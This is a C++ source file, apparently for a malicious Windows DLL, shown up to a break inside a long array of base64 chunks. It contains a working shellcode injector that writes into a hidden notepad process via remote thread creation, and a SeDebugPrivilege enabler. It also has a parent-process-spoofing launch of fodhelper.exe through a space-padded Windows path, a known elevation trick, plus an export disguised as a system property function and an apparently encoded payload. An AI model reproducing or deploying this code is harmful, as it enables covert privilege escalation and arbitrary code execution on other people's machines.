#include "pch.h"



class Injector {
public:
	static void Run(int procPID, const unsigned char* shellcode, size_t shellcodeSize) {

		HANDLE procHandle = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, procPID);
		if (procHandle == NULL) {
			std::cerr << "Failed to open process with error code: " << GetLastError() << std::endl;
			return;
		}

		LPVOID allocMemAddress = VirtualAllocEx(procHandle, NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
		if (allocMemAddress == NULL) {
			std::cerr << "Failed to allocate memory with error code: " << GetLastError() << std::endl;
			return;
		}

		SIZE_T bytesWritten;
		if (!WriteProcessMemory(procHandle, allocMemAddress, shellcode, shellcodeSize, &bytesWritten)) {
			std::cerr << "Failed to write process memory with error code: " << GetLastError() << std::endl;
			return;
		}

		if (CreateRemoteThread(procHandle, NULL, 0, (LPTHREAD_START_ROUTINE)allocMemAddress, NULL, 0, NULL) == NULL) {
			std::cerr << "Failed to create remote thread with error code: " << GetLastError() << std::endl;
			return;
		}

		CloseHandle(procHandle);
	}
};


unsigned char* base64_decode(const std::string& base64, size_t& out_size) {
	static constexpr char base64_lookup[] =
		"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
		"abcdefghijklmnopqrstuvwxyz"
		"0123456789+/";

	std::vector<unsigned char> decoded;
	unsigned int value = 0;
	int bits = 0;

	for (char c : base64) {
		if (c == '=') {
			break;
		}

		const char* pos = std::find(base64_lookup, base64_lookup + 64, c);
		if (pos != base64_lookup + 64) {
			value = (static_cast<unsigned long long>(value) << 6) | (pos - base64_lookup);
			bits += 6;
			if (bits >= 8) {
				decoded.push_back(static_cast<unsigned char>((value >> (bits - 8)) & 0xFF));
				bits -= 8;
			}
		}
	}

	out_size = decoded.size();
	unsigned char* decoded_data = new unsigned char[out_size];
	std::memcpy(decoded_data, decoded.data(), out_size);

	return decoded_data;
}
int startNotepad()
{
	STARTUPINFO si;
	PROCESS_INFORMATION pi;
	ZeroMemory(&si, sizeof(si));
	si.cb = sizeof(si);
	si.dwFlags = STARTF_USESHOWWINDOW;
	si.wShowWindow = SW_HIDE;
	ZeroMemory(&pi, sizeof(pi));

	wchar_t commandLine[] = L"notepad.exe";

	BOOL bResult = CreateProcess(
		NULL,
		commandLine,
		NULL,
		NULL,
		FALSE,
		0,
		NULL,
		NULL,
		&si,
		&pi
	);

	if (!bResult) {
		std::cerr << "Error: could not create child process (error code " << GetLastError() << ")" << std::endl;
		return 1;
	}

	return pi.dwProcessId;
}

bool IsSystemAccount()
{
	const std::wstring systemAccountName = L"SYSTEM";
	wchar_t userNameBuffer[256];
	DWORD bufferSize = sizeof(userNameBuffer) / sizeof(userNameBuffer[0]);

	if (!GetUserNameW(userNameBuffer, &bufferSize))
	{
		std::cerr << "Failed to get user name. Error: " << GetLastError() << std::endl;
		return false;
	}

	std::wstring currentUserName(userNameBuffer);
	return (currentUserName == systemAccountName);
}

int SpawnProcess(int parentId) {


	PROCESS_INFORMATION processInfo;
	STARTUPINFOEXW startupInfoEx;
	SIZE_T attributeListSize;

	ZeroMemory(&processInfo, sizeof(processInfo));
	ZeroMemory(&startupInfoEx, sizeof(startupInfoEx));
	startupInfoEx.StartupInfo.cb = sizeof(startupInfoEx);

	InitializeProcThreadAttributeList(nullptr, 1, 0, &attributeListSize);
	startupInfoEx.lpAttributeList = reinterpret_cast<LPPROC_THREAD_ATTRIBUTE_LIST>(HeapAlloc(GetProcessHeap(), 0, attributeListSize));
	InitializeProcThreadAttributeList(startupInfoEx.lpAttributeList, 1, 0, &attributeListSize);

	HANDLE parentHandle = OpenProcess(PROCESS_CREATE_PROCESS | PROCESS_DUP_HANDLE, FALSE, parentId);
	if (parentHandle == nullptr) {
		std::cerr << "Failed to open parent process with error code: " << GetLastError() << std::endl;
		return 1;
	}

	UpdateProcThreadAttribute(startupInfoEx.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &parentHandle, sizeof(parentHandle), nullptr, nullptr);

	SECURITY_ATTRIBUTES processSec;
	SECURITY_ATTRIBUTES threadSec;
	processSec.nLength = sizeof(processSec);
	processSec.lpSecurityDescriptor = nullptr;
	processSec.bInheritHandle = TRUE;
	threadSec.nLength = sizeof(threadSec);
	threadSec.lpSecurityDescriptor = nullptr;
	threadSec.bInheritHandle = TRUE;

	if (!CreateProcessW(L"C:\\Windows \\System32\\fodhelper.exe", NULL, &processSec, &threadSec, TRUE, EXTENDED_STARTUPINFO_PRESENT | CREATE_NEW_CONSOLE, nullptr, nullptr, reinterpret_cast<LPSTARTUPINFOW>(&startupInfoEx), &processInfo)) {
		std::cerr << "Failed to spawn process with error code: " << GetLastError() << std::endl;
		return 1;
	}

	WaitForSingleObject(processInfo.hProcess, INFINITE);

	CloseHandle(processInfo.hProcess);
	CloseHandle(processInfo.hThread);
	CloseHandle(parentHandle);
	HeapFree(GetProcessHeap(), 0, startupInfoEx.lpAttributeList);

	return 0;
}

void EnableSeDebugPrivilegePrivilege()
{
	LUID luid;
	HANDLE currentProc = OpenProcess(PROCESS_ALL_ACCESS, false, GetCurrentProcessId());

	if (currentProc)
	{
		HANDLE TokenHandle(NULL);
		BOOL hProcessToken = OpenProcessToken(currentProc, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &TokenHandle);
		if (hProcessToken)
		{
			BOOL checkToken = LookupPrivilegeValue(NULL, L"SeDebugPrivilege", &luid);

			if (!checkToken)
			{
				std::cerr << "The existing process token already contains the SeDebugPrivilege." << std::endl;
			}
			else
			{
				TOKEN_PRIVILEGES tokenPrivs;

				tokenPrivs.PrivilegeCount = 1;
				tokenPrivs.Privileges[0].Luid = luid;
				tokenPrivs.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

				BOOL adjustToken = AdjustTokenPrivileges(TokenHandle, FALSE, &tokenPrivs, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL);

				if (adjustToken != 0)
				{
					std::cerr << "The SeDebugPrivilege has been appended to the current process token." << std::endl;
				}
			}
			CloseHandle(TokenHandle);
		}
	}
	CloseHandle(currentProc);
}

extern "C" __declspec(dllexport) int PSGetPropertyDescription()
{
	if (!IsSystemAccount()) {
		EnableSeDebugPrivilegePrivilege();
		int parentId = 980;
		SpawnProcess(parentId);
		return 0;
	}
	const char* chunks[] = {
	"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",
